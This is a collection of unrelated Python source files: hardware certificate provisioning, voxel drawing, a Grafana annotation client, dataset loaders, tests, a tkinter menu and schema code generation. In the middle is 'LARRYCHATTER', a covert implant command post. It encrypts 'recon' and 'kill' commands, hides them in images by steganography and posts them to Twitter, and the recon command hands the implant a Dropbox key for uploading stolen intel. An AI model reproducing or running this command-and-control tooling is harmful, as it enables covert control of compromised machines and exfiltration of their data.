elif (slot_type == "cert"):
print("Slot", slot_number, "is a certificate slot, no action required now, will be updated as part of Generate Certificates")
elif (slot_type == "public"):
addstr = "_ecc_key_pair"
key_file_name = "slot_" + str(slot_number) + addstr + ".pem"
priv_key = ec.generate_private_key(ec.SECP256R1(), crypto_be)
# Save private key to file
with open(key_file_name, 'wb') as f:
pem_key = priv_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption())
f.write(pem_key)
f.close()
with open(key_file_name, 'rb') as f:
# Load the public key from key file
priv_key = serialization.load_pem_private_key(
data=f.read(),
password=<PASSWORD>,
backend=default_backend())
public_key = priv_key.public_key().public_numbers().encode_point()[1:]
if (slot_number == 14):
public_key_check_validate()
public_key_slot_data = bytearray(4) + public_key[0:32] + bytearray(4) + public_key[32:64]
#write secure boot public key to crypto device
assert atcab_write_bytes_zone(ATCA_ZONE_DATA, slot_number, 0, public_key_slot_data, 72) == Status.ATCA_SUCCESS
print("Slot", slot_number, "is a "+tflexSlotType[slot_number]+' key slot, created ' + key_file_name+' and programmed')
else:
raise ValueError("Undefined slot type")
return True
def mchp_cert():
"""
Function check the if device contains MCHP certificate or not.
If MCHP cert, it will validate the cert chain and print it.
If MCHP cert not found, then it will check backup cert in the filesystem and
it will provision into device
"""
mchp_cert_info = isMCHP_cert()
if mchp_cert_info['status'] == Status.ATCA_SUCCESS:
status = certs_handler.validate_and_print_certificate_chain(mchp_cert_info['root_cert'],
mchp_cert_info['signer_cert'], mchp_cert_info['device_cert'])
else:
status = mchp_cert_bckp(mchp_cert_info)
if status == Status.ATCA_SUCCESS:
return 'success'
else:
return 'danger'
def custom_cert(org_name):
"""
Function takes MCHP certificates backup if it found in device and
generate custom certificate and provision to device
"""
mchp_cert_info = isMCHP_cert()
if mchp_cert_info['status'] == Status.ATCA_SUCCESS:
status = mchp_cert_bckp(mchp_cert_info)
#org_name = "{:<24}".format(org_name[:24]).replace(" ", "_")
#print('Adjusted Orgname for size and spaces:' + org_name)
#assert len(org_name) < 25, "Org name can be maximum of 24 characters"
root_key_path = Path('root_key.key')
root_pub_key_path = Path('root_pub_key.pem')
root_cert_path = Path('root_crt.crt')
signer_id = 'FFFF'
signer_key_path = Path('signer_'+signer_id+'.key')
signer_cert_path = Path('signer_'+signer_id+'.crt')
device_cert_path = Path('device_template.crt')
certs_handler.set_root_user_data(org_name)
certs_handler.set_signer_user_data(org_name)
certs_handler.set_device_user_data(org_name)
certs_handler.create_trust_chain(root_key_path, root_cert_path, signer_id, signer_key_path, signer_cert_path, device_cert_path)
signer_cert_def, device_cert_def = certs_handler.generate_cert_def_files(root_cert_path, signer_id, signer_cert_path, device_cert_path)
with open(root_pub_key_path, 'w') as f:
f.write(common_helper.convert_ec_pub_to_pem(certs_handler.get_public_key(root_key_path)))
f.close()
print('Read device serial number...', end='')
serial_num = bytearray(9)
assert Status.ATCA_SUCCESS == atcab_read_serial_number(serial_num)
print('OK (SN: {})'.format(serial_num.hex().upper()))
print('Read device public key from slot {}...'.format(device_cert_def.private_key_slot), end='')
public_key = bytearray(64)
assert Status.ATCA_SUCCESS == atcab_get_pubkey(device_cert_def.private_key_slot, public_key)
print('OK (Public Key: {})'.format(public_key.hex().upper()))
print('Generating device certificate...'.format(device_cert_def.private_key_slot), end='')
device_cert_path = Path('device_{}.crt'.format(base64.b16encode(serial_num).decode('ascii')))
device_cert = certs_handler.build_device_cert(serial_num, public_key, signer_key_path, signer_cert_path, device_cert_path)
print('OK (saved to {})'.format(device_cert_path))
print('Saving signer certificate to device...', end='')
signer_cert_der = read_cert(signer_cert_path).public_bytes(encoding=Encoding.DER)
assert Status.ATCA_SUCCESS == atcacert_write_cert(signer_cert_def, signer_cert_der, len(signer_cert_der))
print('OK')
print('Saving device certificate to device...', end='')
device_cert_der = device_cert.public_bytes(encoding=Encoding.DER)
assert Status.ATCA_SUCCESS == atcacert_write_cert(device_cert_def, device_cert_der, len(device_cert_der))
print('OK')
for extension in device_cert.extensions:
if extension.oid._name != 'subjectKeyIdentifier':
continue # Not the extension we're looking for, skip
thing_name = binascii.b2a_hex(extension.value.digest).decode('ascii')
print('Thing ID {}'.format(thing_name))
kit_info = certs_handler.read_kit_info()
kit_info['thing_name'] = thing_name.lower()
certs_handler.save_kit_info(kit_info)
print('\n\r---------------------------------------------')
print('Custom certificate generation and provisioning - SUCCESS')
print('---------------------------------------------\n\r')
# validate and print the certificate chain
status = certs_handler.validate_and_print_certificate_chain(read_cert(root_cert_path),
read_cert(signer_cert_path), read_cert(device_cert_path))
if status == Status.ATCA_SUCCESS:
return 'success'
else:
return 'danger'
|
11556991
|
from distutils.core import setup, Extension
import platform
libname = 'ivhc'
if platform.system()=='Darwin':
libname = 'ivhc.mac'
module = Extension('ivhc',
sources = ['ivhcNoiseEst.cpp'],
include_dirs = [],
libraries = [libname],
library_dirs = ['/usr/local/lib', './'],
extra_compile_args=['-std=c++11'])
setup(name = 'ivhc',
version = '1.0',
description = 'ivhc for image noise estimation',
ext_modules = [module])
|
11556995
|
from functools import reduce
from Obj3D import Point3D, Sphere, Cone, calculateBound, calScaleRatio
import numpy as np
from numpy import linalg as LA
from scipy.spatial import distance_matrix
def getObjList(nodes, graph, node_idx=None):
if node_idx:
# 球体索引列表
sphere_idxs = [node_idx]+list(graph[node_idx])
sphere_list = [Sphere(Point3D(*nodes[x].pos), nodes[x].r) for x in sphere_idxs]
# 椎体索引对列表
cone_idx_pairs = [(node_idx, x) for x in graph[node_idx]]
cone_list = [Cone(Point3D(*nodes[p[0]].pos),nodes[p[0]].r,Point3D(*nodes[p[1]].pos),nodes[p[1]].r) for p in cone_idx_pairs]
else: # Returen all nodes
sphere_list=[]
cone_list=[]
for node_idx in nodes.keys():
# 加入当前节点对应的球体
sphere_list.append(Sphere(Point3D(*nodes[node_idx].pos), nodes[node_idx].r))
# 椎体索引对列表
cone_idx_pairs = [(node_idx, x) for x in graph[node_idx] if node_idx<x]
cone_list_local = [Cone(Point3D(*nodes[p[0]].pos),nodes[p[0]].r,Point3D(*nodes[p[1]].pos),nodes[p[1]].r) \
for p in cone_idx_pairs]
cone_list.extend(cone_list_local)
return sphere_list, cone_list
def checkSphereV2(mark, sphere, img_shape):
bbox = list(sphere.calBBox()) # xmin,ymin,zmin,xmax,ymax,zmax
for i in range(3):
j = i+3
if (bbox[i]<0):
bbox[i] = 0
if (bbox[j]>img_shape[i]):
bbox[j] = img_shape[i]
(xmin,ymin,zmin,xmax,ymax,zmax) = tuple(bbox)
(x_idxs,y_idxs,z_idxs)=np.where(mark[xmin:xmax,ymin:ymax,zmin:zmax]==0)
# points=img_idxs[:3, xmin+x_idxs, ymin+y_idxs, zmin+z_idxs] # 3*M
# points=points.T # M*3
xs = np.asarray(xmin+x_idxs).reshape((len(x_idxs),1))
ys = np.asarray(ymin+y_idxs).reshape((len(y_idxs),1))
zs = np.asarray(zmin+z_idxs).reshape((len(z_idxs),1))
points=np.hstack((xs,ys,zs))
sphere_c_mat = np.array([sphere.center_point.toList()]) # 1*3
# 计算所有点到所有球心的距离
dis_mat = distance_matrix(points,sphere_c_mat) # M*1
# 判断距离是否小于半径
res_idxs = np.where(dis_mat<=sphere.radius)[0]
mark[xmin+x_idxs[res_idxs], ymin+y_idxs[res_idxs], zmin+z_idxs[res_idxs]] = 255
def checkConeV2(mark, cone, img_shape):
bbox = list(cone.calBBox()) # xmin,ymin,zmin,xmax,ymax,zmax
for i in range(3):
j = i+3
if (bbox[i]<0):
bbox[i] = 0
if (bbox[j]>img_shape[i]):
bbox[j] = img_shape[i]
(xmin,ymin,zmin,xmax,ymax,zmax) = tuple(bbox)
(x_idxs,y_idxs,z_idxs)=np.where(mark[xmin:xmax,ymin:ymax,zmin:zmax]==0)
# points=img_idxs[:, xmin+x_idxs, ymin+y_idxs, zmin+z_idxs] # 3*M
# points=points.T # M*3
xs = np.asarray(xmin+x_idxs).reshape((len(x_idxs),1))
ys = np.asarray(ymin+y_idxs).reshape((len(y_idxs),1))
zs = np.asarray(zmin+z_idxs).reshape((len(z_idxs),1))
ns = np.ones((len(z_idxs),1))
points=np.hstack((xs,ys,zs,ns))
# 每个圆锥的还原矩阵
r_min=cone.up_radius
r_max=cone.bottom_radius
height=cone.height
cone_revert_mat = cone.revertMat().T # 4*4
# 每个椎体还原后坐标
revert_coor_mat = np.matmul(points, cone_revert_mat) # M*4
revert_radius_list = LA.norm(revert_coor_mat[:,:2], axis=1) # M
# Local Indexs
M = points.shape[0]
l_idx = np.arange(M) # M (1-dim)
l_mark = np.ones((M,), dtype=bool)
# 过滤高度在外部的点
res_idxs = np.logical_or(revert_coor_mat[l_idx[l_mark],2]<0, revert_coor_mat[l_idx[l_mark],2]>height)
l_mark[l_idx[l_mark][res_idxs]]=False
# 过滤半径在外部的点
res_idxs = revert_radius_list[l_idx[l_mark]]>r_max
l_mark[l_idx[l_mark][res_idxs]]=False
# 过滤半径在内部的点
res_idxs = revert_radius_list[l_idx[l_mark]]<=r_min
mark[xmin+x_idxs[l_idx[l_mark][res_idxs]], ymin+y_idxs[l_idx[l_mark][res_idxs]], zmin+z_idxs[l_idx[l_mark][res_idxs]]] = 255
l_mark[l_idx[l_mark][res_idxs]]=False
# 计算剩余
# import pdb
# pdb.set_trace();
if r_max>r_min:
res_idxs = ((r_max-revert_radius_list[l_idx[l_mark]])*height/(r_max-r_min)) >= revert_coor_mat[l_idx[l_mark],2]
mark[xmin+x_idxs[l_idx[l_mark][res_idxs]], ymin+y_idxs[l_idx[l_mark][res_idxs]], zmin+z_idxs[l_idx[l_mark][res_idxs]]] = 255
l_mark[l_idx[l_mark][res_idxs]]=False
#@profile
def draw3dStackSparseV2(sphere_list, cone_list, img_shape):
'''draw3dStack: Draw 3D image stack.
Args:
param1 (int): The first parameter.
Returns:
bool: The return value.
'''
# print('img_shape', img_shape)
img_total_length = reduce(lambda x,y:x*y, img_shape)
# 创建原始矩阵
mark = np.zeros(img_shape, dtype=np.uint8)
# 对球体进行判断
for s in sphere_list:
checkSphereV2(mark, s, img_shape);
# 对圆台进行判断
for c in cone_list:
checkConeV2(mark, c, img_shape);
## 绘制
#mark=np.where(mark==1, 255, 0).astype(np.uint8)
mark=np.swapaxes(mark,0,2)
return mark
|
11556999
|
import re
# from whoosh.fields import NGRAMWORDS, TEXT, Schema
# from whoosh.filedb.filestore import RamStorage
# from whoosh.qparser import OrGroup, QueryParser
# from whoosh.query import Every
class SimpleIndex():
'''
Right now we're just doing substring search because indexing
made startup too slow, but making sure it is done through
this interface makes it easier for us to plug in something better,
at some point.
'''
def __init__(self):
self._index = {}
def add_document(self, doc_id, document):
self._index[doc_id] = document
def search(self, substrings):
if substrings:
matches = []
for substring in re.split('\s+', substrings.strip()):
matches.extend([
id for (id, document) in self._index.items()
if substring in document
])
return matches
else:
return self._index.copy()
# commented out in requirements.txt:
# class WhooshIndex():
# # Search might be fast, but indexing is too slow to be useful.
#
# def __init__(self):
# storage = RamStorage()
# schema = Schema(gene_id=TEXT(stored=True),
# gene_tokens=NGRAMWORDS(stored=False, minsize=1))
# self._index = storage.create_index(schema)
#
# def add(self, *gene_ids):
# writer = self._index.writer()
# for gene_id in gene_ids:
# writer.add_document(gene_id=gene_id,
# gene_tokens=gene_id)
# writer.commit()
#
# def search(self, substrings):
# with self._index.searcher() as searcher:
# parser = QueryParser('gene_tokens', self._index.schema,
# group=OrGroup)
# query = parser.parse(substrings) if substrings else Every()
# results = searcher.search(query)
# return [result['gene_id'] for result in results]
|
11557000
|
from IPython.terminal.interactiveshell import TerminalInteractiveShell
TerminalInteractiveShell.confirm_exit = False
c = get_config()
try:
import line_profiler
c.TerminalIPythonApp.extensions = [
'line_profiler',
]
except Exception:
pass
|
11557068
|
def get_base_model(app_label, model):
from django.contrib.contenttypes.models import ContentType
return ContentType.objects.get(app_label=app_label.lower(), model=model.lower()).model_class()
def normalise_field(text):
return text.strip().replace('(', '::').replace(')', '').replace(".", "__")
|
11557076
|
import requests
import time
from influxdb import InfluxDBClient
from urllib.parse import urlparse
CURRENT_TIMESTAMP = int(time.time())
class Annotation:
"""
An annotation that we want to create
"""
def __init__(self, title, tags, description='', start=CURRENT_TIMESTAMP, end=CURRENT_TIMESTAMP):
if len(tags) == 0:
raise ValueError('Annotations must have at least one tag.')
if end < start:
raise ValueError('Annotation end time cannot be before start time.')
self.title = title
self.tags = tags
self.description = description
self.start = start
self.end = end
def web(self):
"""
Returns an annotation object formatted for grafana API
"""
annotation_event = {}
annotation_event['text'] = '<b>%s</b>\n\n%s' % (self.title, self.description)
annotation_event['tags'] = self.tags
annotation_event['time'] = int(round(self.start * 1000))
if self.start < self.end:
annotation_event['isRegion'] = True
annotation_event['timeEnd'] = int(round(self.end * 1000))
return annotation_event
def influxdb(self):
"""
Returns an annotation object formatted for InfluxDB
"""
tags_field = ';'.join(self.tags)
annotation_event = {}
annotation_event['measurement'] = 'events'
annotation_event['fields'] = {
'title': self.title,
'text': self.description,
'tags': tags_field
}
return [annotation_event]
def send(self, url, api_key):
"""
Send the annotation to a destination based on url
"""
url_parts = urlparse(url)
if 'http' in url_parts.scheme:
return self.send_to_web(url_parts, api_key)
elif 'influx' in url_parts.scheme:
return self.send_to_influxdb(url_parts)
else:
raise NotImplementedError('Scheme %s not recognised in uri %s' %
(url_parts.scheme, url))
def send_to_web(self, url_parts, api_key):
"""
POST event to an endpoint in Grafana Annotations API format
"""
event_data = self.web()
result_data = {'event_data': event_data}
url = url_parts.geturl()
auth_tuple = None
req_headers = {}
if api_key is not None:
req_headers['Authorization'] = "Bearer %s" % api_key
if url_parts.username and url_parts.password:
auth_tuple = (url_parts.username, url_parts.password)
url_host_port = url_parts.netloc.split('@')[1]
url = '%s://%s%s' % (url_parts.scheme, url_host_port, url_parts.path)
post_result = requests.post(url, json=event_data, auth=auth_tuple, headers=req_headers, timeout=5)
if post_result.status_code > 299:
raise Exception('Received %s response, sending event failed' % post_result.status_code)
if 'id' in post_result.json():
result_data['id'] = post_result.json()['id']
if 'message' in post_result.json():
result_data['message'] = post_result.json()['message']
return result_data
def send_to_influxdb(self, url_parts):
event_data = self.influxdb()
result_data = {'event_data': event_data}
client = InfluxDBClient(url_parts.hostname,
url_parts.port or 8086,
url_parts.username or '',
url_parts.password or '',
url_parts.path.replace('/', '', 1) or 'events')
if client.write_points(event_data):
result_data['message'] = 'Annotation added'
else:
result_data['message'] = 'Annotation failed'
return result_data
|
11557081
|
import tensorflow as tf
def independent_outputs(featuremap, output_names, num_channels, filter_width, padding, activation):
outputs = dict()
for name in output_names:
outputs[name] = tf.layers.conv1d(featuremap, num_channels, filter_width, activation=activation, padding=padding)
return outputs
|
11557134
|
import numpy as np
import pytest
import xarray as xr
import py3dep
from py3dep import MissingAttribute, MissingColumns, MissingCRS, MissingDependency
def test_missing_nodata():
with pytest.raises(MissingAttribute) as ex:
dem = xr.DataArray(np.random.randn(2, 3), dims=("x", "y"), coords={"x": [10, 20]})
_ = py3dep.fill_depressions(dem)
assert "nodatavals" in str(ex.value)
|
11557156
|
import os
import dgl
import torch
import pickle
import pysmiles
from data_processing import networkx_to_dgl
class PropertyPredDataset(dgl.data.DGLDataset):
def __init__(self, args):
self.args = args
self.path = '../data/' + args.dataset + '/' + args.dataset
self.graphs = []
self.labels = []
super().__init__(name='property_pred_' + args.dataset)
def to_gpu(self):
if torch.cuda.is_available():
print('moving ' + self.args.dataset + ' dataset to GPU')
self.graphs = [graph.to('cuda:' + str(self.args.gpu)) for graph in self.graphs]
def save(self):
print('saving ' + self.args.dataset + ' dataset to ' + self.path + '.bin')
dgl.save_graphs(self.path + '.bin', self.graphs, {'label': self.labels})
def load(self):
print('loading ' + self.args.dataset + ' dataset from ' + self.path + '.bin')
self.graphs, self.labels = dgl.load_graphs(self.path + '.bin')
self.labels = self.labels['label']
self.to_gpu()
def process(self):
print('loading feature encoder from ../saved/' + self.args.pretrained_model + '/feature_enc.pkl')
with open('../saved/' + self.args.pretrained_model + '/feature_enc.pkl', 'rb') as f:
feature_encoder = pickle.load(f)
print('processing ' + self.args.dataset + ' dataset')
with open(self.path + '.csv') as f:
for idx, line in enumerate(f.readlines()):
if idx == 0 or line == '\n':
continue
items = line.strip().split(',')
if self.args.dataset == 'BBBP':
smiles, label = items[-1], items[-2]
# the next line is to remove unnecessary hydrogen atoms that will cause discontinuous node labels
smiles = smiles.replace('([H])', '').replace('[H]', '')
elif self.args.dataset == 'HIV':
smiles, label = items[0], items[-1]
smiles = smiles.replace('se', 'Se').replace('te', 'Te')
elif self.args.dataset == 'BACE':
smiles, label = items[0], items[2]
elif self.args.dataset == 'Tox21':
smiles, label = items[-1], items[11]
smiles = smiles.replace('se', 'Se')
if label == '':
continue
elif self.args.dataset == 'ClinTox':
smiles, label = items[0], items[2]
smiles = smiles.replace('[H]', '')
else:
raise ValueError('unknown dataset')
raw_graph = pysmiles.read_smiles(smiles, zero_order_bonds=False)
dgl_graph = networkx_to_dgl(raw_graph, feature_encoder)
self.graphs.append(dgl_graph)
self.labels.append(float(label))
self.labels = torch.Tensor(self.labels)
self.to_gpu()
def has_cache(self):
if os.path.exists(self.path + '.bin'):
print('cache found')
return True
else:
print('cache not found')
return False
def __getitem__(self, i):
return self.graphs[i], self.labels[i]
def __len__(self):
return len(self.graphs)
def load_data(args):
data = PropertyPredDataset(args)
return data
|
11557157
|
import viewflow
from unittest.mock import patch, ANY, call
@patch("viewflow.parsers.dependencies_r_patterns.custom_get_dependencies")
@patch("viewflow.parsers.dependencies_r_patterns.get_dependencies_default")
def test_default(get_default_mock, get_custom_mock):
viewflow.create_dag("./tests/projects/rmd/default_config")
# calling 'create_dag' does not resolve dependencies by default
get_default_mock.assert_not_called()
get_custom_mock.assert_not_called()
@patch("viewflow.parsers.dependencies_r_patterns.custom_get_dependencies")
@patch("viewflow.parsers.dependencies_r_patterns.get_dependencies_default")
def test_default_pattern(get_default_mock, get_custom_mock):
viewflow.create_dag("./tests/projects/rmd/pattern_default")
# Dependencies must have been retrieved for all possible schema's
calls = [call(ANY, "viewflow"), call(ANY, "public")]
get_default_mock.assert_has_calls(calls, any_order=True)
get_custom_mock.assert_not_called()
@patch("viewflow.parsers.dependencies_r_patterns.custom_get_dependencies")
@patch("viewflow.parsers.dependencies_r_patterns.get_dependencies_default")
def test_custom_pattern(get_default_mock, get_custom_mock):
viewflow.create_dag("./tests/projects/rmd/pattern_custom")
# Dependencies must have been retrieved for all possible schema's
get_default_mock.assert_not_called()
calls = [call(ANY, "viewflow"), call(ANY, "public")]
get_custom_mock.assert_has_calls(calls, any_order=True)
|
11557164
|
from cryptography.fernet import Fernet
import stepic
import tweepy
from PIL import Image
from termcolor import colored
import pyfiglet
import sys
import os
COMMANDS = {'help':['Shows this help'],
'recon':['Recon module. Perform reconnaisance on the target system and upload Intel on Dropbox'],
'kill':['Kills the Implant on target machine'],
'shutdown':['Shuts down Command Post'],
}
# Twitter Dev Account API Keys
CONSUMER_KEY = ''
CONSUMER_SECRET = ''
ACCESS_TOKEN = ''
ACCESS_TOKEN_SECRET = ''
# Encryption/Decryption Symmetric Key (Hardcoded) - PLEASE CHANGE IT!
key = b'<KEY>
def encrypt(plaintext, key):
# Takes the plain text as string and key and encrypts and returns the encrypted text
plaintext = plaintext.encode()
f = Fernet(key)
enctext = f.encrypt(plaintext)
enctext = enctext.decode()
return enctext
def main():
global CONSUMER_KEY
global CONSUMER_SECRET
global ACCESS_TOKEN
global ACCESS_TOKEN_SECRET
print_banner()
print("\n")
CONSUMER_KEY = input(colored("Enter the Consumer Key: ", 'blue'))
CONSUMER_SECRET = input(colored("Enter the Consumer Secret: ", 'blue'))
ACCESS_TOKEN = input(colored("Enter the Access Token: ", 'blue'))
ACCESS_TOKEN_SECRET = input(colored("Enter the Access Token Secret: ", 'blue'))
print("\n")
while True:
command = input(colored(">> ", "blue"))
if command == 'help':
print("\n")
print_help()
print("\n")
elif command == 'shutdown':
print("\n")
print(colored("[+] Command Post is shutting down...", "blue"))
print("\n")
sys.exit(0)
elif command == 'kill':
print("\n")
imgpath = input(colored("Enter the complete path to the Image file: ", 'blue'))
message = 'kill'
enctext = encrypt(message, key)
embedInImage(enctext, imgpath)
try:
postTweetPhoto()
print("\n")
print(colored("[+] kill command sent", "blue"))
print("\n")
except:
print("\n")
print(colored("[!] Unable to send kill command", "blue"))
print("\n")
elif command == 'recon':
print("\n")
imgpath = input(colored("Enter the complete path to the Image file: ", 'blue'))
print("\n")
api = input(colored("Enter the Dropbox API Key for Implant to upload the collected Intel: ", "blue"))
message = command + " " + api
enctext =encrypt(message, key)
embedInImage(enctext, imgpath)
try:
postTweetPhoto()
print("\n")
print(colored("[+] recon command sent", "blue"))
print("\n")
except:
print("\n")
print(colored("[!] Unable to send recon command", "blue"))
print("\n")
else:
print("\n")
print(colored("[!] Command unrecognized.", "blue"))
print("\n")
def embedInImage(message,path):
path = path.encode()
image = Image.open(path)
message = message.encode()
stegoImage = stepic.encode(image, message)
stegoImageCWD = os.getcwd()
stegoImagePath = stegoImageCWD + '/secret-file.png'
stegoImage.save(stegoImagePath, 'PNG')
def postTweetPhoto():
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
stegoImageCWD = os.getcwd()
stegoImagePath = stegoImageCWD + '/secret-file.png'
api.update_with_media(stegoImagePath)
def print_help():
for cmd, v in COMMANDS.items():
print(colored("{0}:\t{1}".format(cmd, v[0]), 'blue'))
def print_banner():
ascii_banner = pyfiglet.figlet_format("LARRYCHATTER")
print(colored(ascii_banner, 'blue'))
print("\n")
print(colored("------------------------ Covert Implant Framework ------------------------", "blue"))
print("\n")
print(colored("Created by @UpayanSaha", "blue"))
if __name__ == "__main__":
main()
|
11557179
|
import pkg_resources # part of setuptools
__version__ = pkg_resources.require("concoct")[0].version
|
11557189
|
import tkinter as tk
import tkinter.font as tk_font
import os
from tkinter import ttk
class ContextMenu(tk.Listbox):
def __init__(self, parent, *args, **kwargs):
tk.Listbox.__init__(self, parent, *args, **kwargs)
self.font_family = parent.font_family
self.font_color = parent.menu_fg
self.bg_color = parent.bg_color
self.active_bg = parent.menubar_bg_active
self.active_fg = parent.menubar_fg_active
self.parent = parent
self.changes = [""]
self.steps = int()
# setting tk.RIGHT click menu bar
self.right_click_menu = tk.Menu(
parent,
font='DroidSansFallback',
fg=self.font_color,
bg=self.bg_color,
activebackground=self.active_bg,
activeforeground=self.active_fg,
bd=0,
tearoff=0)
self.right_click_menu.add_command(
label='Cut',
command=self.parent.textarea.event_generate('<<Cut>>'))
self.right_click_menu.add_command(
label='Copy',
command=self.parent.textarea.event_generate('<<Copy>>'))
self.right_click_menu.add_command(
label='Paste',
command=self.parent.textarea.event_generate('<<Paste>>'))
self.right_click_menu.add_command(
label='Bold',
command=self.bold)
self.right_click_menu.add_command(
label='Highlight',
command=self.hightlight)
def popup(self, event):
try:
self.right_click_menu.tk_popup(event.x_root, event.y_root, 0)
finally:
self.right_click_menu.grab_release()
def undo(self, event=None):
if self.steps != 0:
self.steps -= 1
self.parent.textarea.delete(0, tk.END)
self.parent.textarea.insert(tk.END, self.changes[self.steps])
def redo(self, event=None):
if self.steps < len(self.changes):
self.parent.textarea.delete(0, tk.END)
self.parent.textarea.insert(tk.END, self.changes[self.steps])
self.steps += 1
def add_changes(self, event=None):
if self.parent.textarea.get() != self.changes[-1]:
self.changes.append(self.parent.textarea.get())
self.steps += 1
# Setting the selected text to be bold
def bold(self, event=None):
if self.parent.filename:
try:
if(os.path.splitext(self.parent.filename)[1][1:] == "txt"):
current_tags = self.parent.textarea.tag_names("sel.first")
bold_font = tk_font.Font(self.parent.textarea, self.parent.textarea.cget("font"))
bold_font.configure(weight = "bold")
self.parent.textarea.tag_config("bold", font = bold_font)
if "bold" in current_tags:
self.parent.textarea.tag_remove("bold", "sel.first", "sel.last")
else:
self.parent.textarea.tag_add("bold", "sel.first", "sel.last")
else:
self.parent.statusbar.update_status('no txt bold')
except tk.TclError:
pass
else:
self.parent.statusbar.update_status('no file')
def hightlight(self, event=None):
if self.parent.filename:
try:
if(os.path.splitext(self.parent.filename)[1][1:] == "txt"):
new_color = self.parent.menubar.open_color_picker()
current_tags = self.parent.textarea.tag_names("sel.first")
highlight_font = tk_font.Font(self.parent.textarea, self.parent.textarea.cget("font"))
self.parent.textarea.tag_config(
f"highlight_{new_color}",
font = highlight_font,
foreground = "black",
background = new_color)
if "highlight" in current_tags:
for tag in current_tags:
if "highlight" in tag:
print(tag)
self.parent.textarea.tag_remove(tag, "sel.first", "sel.last")
else:
self.parent.textarea.tag_add("highlight", "sel.first", "sel.last")
self.parent.textarea.tag_add(f"highlight_{new_color}","sel.first", "sel.last")
else:
self.parent.statusbar.update_status('no txt high')
except tk.TclError:
pass
else:
self.parent.statusbar.update_status('no file')
|
11557232
|
import copy
from pyschema import types
import pyschema
import os
import sys
from collections import defaultdict
DEFAULT_INDENT = " " * 4
class SourceGenerationError(Exception):
pass
def to_python_source(classes, indent=DEFAULT_INDENT):
"""Convert a set of pyschemas to executable python source code
Currently supports all built-in types for basic usage.
Notably not supported:
* Maintaining class hierarchy
* Methods, properties and non-field attributes
* SELF-references
"""
return header_source() + "\n" + classes_source(classes, indent)
RESERVED_KEYWORDS = [
"and", "del", "from", "not", "while", "as", "elif",
"global", "or", "with", "assert", "else", "if",
"pass", "yield", "break", "except", "import",
"print", "class", "exec", "in", "raise", "continue",
"finally", "is", "return", "def", "for", "lambda", "try"
]
def make_safe(package_name):
parts = package_name.split(".")
for kw in RESERVED_KEYWORDS:
while kw in parts:
i = parts.index(kw)
parts[i] = kw + "_"
return ".".join(parts)
class PackageBuilder(object):
def __init__(self, target_folder, parent_package, indent=DEFAULT_INDENT):
self.target_folder = target_folder
self.parent_package = parent_package
self.indent = indent
def get_namespace(self, schema):
try:
namespace = make_safe(schema._namespace)
except AttributeError:
namespace = None
return namespace
def get_namespace_clusters(self, all_classes):
namespace_cluster = defaultdict(set)
for c in all_classes:
namespace = self.get_namespace(c)
namespace_cluster[namespace].add(c)
return namespace_cluster
def format_definitions(self, classes):
return "\n\n".join([_class_source(c, self.indent) for c in classes])
def write_namespace_file(self, namespace, module_code):
if not namespace:
key = ['__init__']
else:
key = namespace.split('.')
output_file = os.path.join(self.target_folder, *key) + '.py'
output_dir = os.path.dirname(output_file)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with open(output_file, 'w') as out_fn:
out_fn.write(module_code)
def write_init_files(self):
def touch_init_file_in_folder(folder):
path = os.path.join(folder, '__init__.py')
if not os.path.exists(path):
open(path, 'w').close()
touch_init_file_in_folder(self.target_folder)
for root, dirs, _ in os.walk(self.target_folder):
for d in dirs:
touch_init_file_in_folder(os.path.join(root, d))
def format_imports(self, imported_classes):
if not imported_classes:
return "\n"
imported_namespaces = self.get_namespace_clusters(imported_classes)
lines = []
for namespace, schemas in imported_namespaces.iteritems():
if self.parent_package:
if namespace:
module = "{}.{}".format(self.parent_package, namespace)
else:
module = self.parent_package
else:
if not namespace:
module = "."
else:
module = namespace
class_part = ", ".join(s.__name__ for s in schemas)
lines.append("from {} import {}".format(module, class_part))
return "\n".join(lines) + "\n\n"
def _get_namespace_prefixes(self, namespaces):
prefixes = []
for n in namespaces:
if n:
parts = n.split(".")
prefixes.append(".".join(parts[:-1]))
return prefixes
def from_classes_with_refs(self, classes):
class_graph = CachedGraphTraverser()
all_classes = set(classes)
for c in classes:
referenced_schemas = class_graph.find_descendants(c)
all_classes |= set(referenced_schemas)
namespace_cluster = self.get_namespace_clusters(all_classes)
parent_namespaces = self._get_namespace_prefixes(namespace_cluster.keys())
ordered_schemas = class_graph.get_reference_ordered_schemas(all_classes)
# Since we don't want to use the previous cached results we create a new instance
# This CachedGraphTraverser will only keep one-child depth for its find_descendants
child_only_class_graph = CachedGraphTraverser()
for namespace, classes in namespace_cluster.iteritems():
inlined_classes = [c for c in ordered_schemas if c in classes]
imported_classes = set()
for inlined in inlined_classes:
direct_references = child_only_class_graph.find_descendants(inlined, max_depth=1)
imported_classes |= set([c for c in direct_references if c not in inlined_classes])
module_code = (
header_source() +
self.format_imports(imported_classes) +
self.format_definitions(inlined_classes)
)
if namespace not in parent_namespaces:
filename = namespace
else:
filename = "{}.{}".format(namespace, "__init__")
self.write_namespace_file(filename, module_code)
self.write_init_files()
def to_python_package(classes, target_folder, parent_package=None, indent=DEFAULT_INDENT):
'''
This function can be used to build a python package representation of pyschema classes.
One module is created per namespace in a package matching the namespace hierarchy.
Args:
classes: A collection of classes to build the package from
target_folder: Root folder of the package
parent_package: Prepended on all import statements in order to support absolute imports.
parent_package is not used when building the package file structure
indent: Indent level. Defaults to 4 spaces
'''
PackageBuilder(target_folder, parent_package, indent).from_classes_with_refs(classes)
def classes_source(classes, indent=DEFAULT_INDENT):
all_classes = set(classes)
class_graph = CachedGraphTraverser()
for c in classes:
referenced_schemas = class_graph.find_descendants(c)
all_classes |= set(referenced_schemas)
ordered = class_graph.get_reference_ordered_schemas(all_classes)
return "\n\n".join([_class_source(c, indent) for c in ordered])
def header_source():
"""Get the required header for generated source"""
return (
"import pyschema\n"
"from pyschema.types import *\n"
"from pyschema.core import NO_DEFAULT\n"
)
def _class_source(schema, indent):
"""Generate Python source code for one specific class
Doesn't include or take into account any dependencies between record types
"""
def_pattern = (
"class {class_name}(pyschema.Record):\n"
"{indent}# WARNING: This class was generated by pyschema.to_python_source\n"
"{indent}# there is a risk that any modification made to this class will be overwritten\n"
"{optional_namespace_def}"
"{field_defs}\n"
)
if hasattr(schema, '_namespace'):
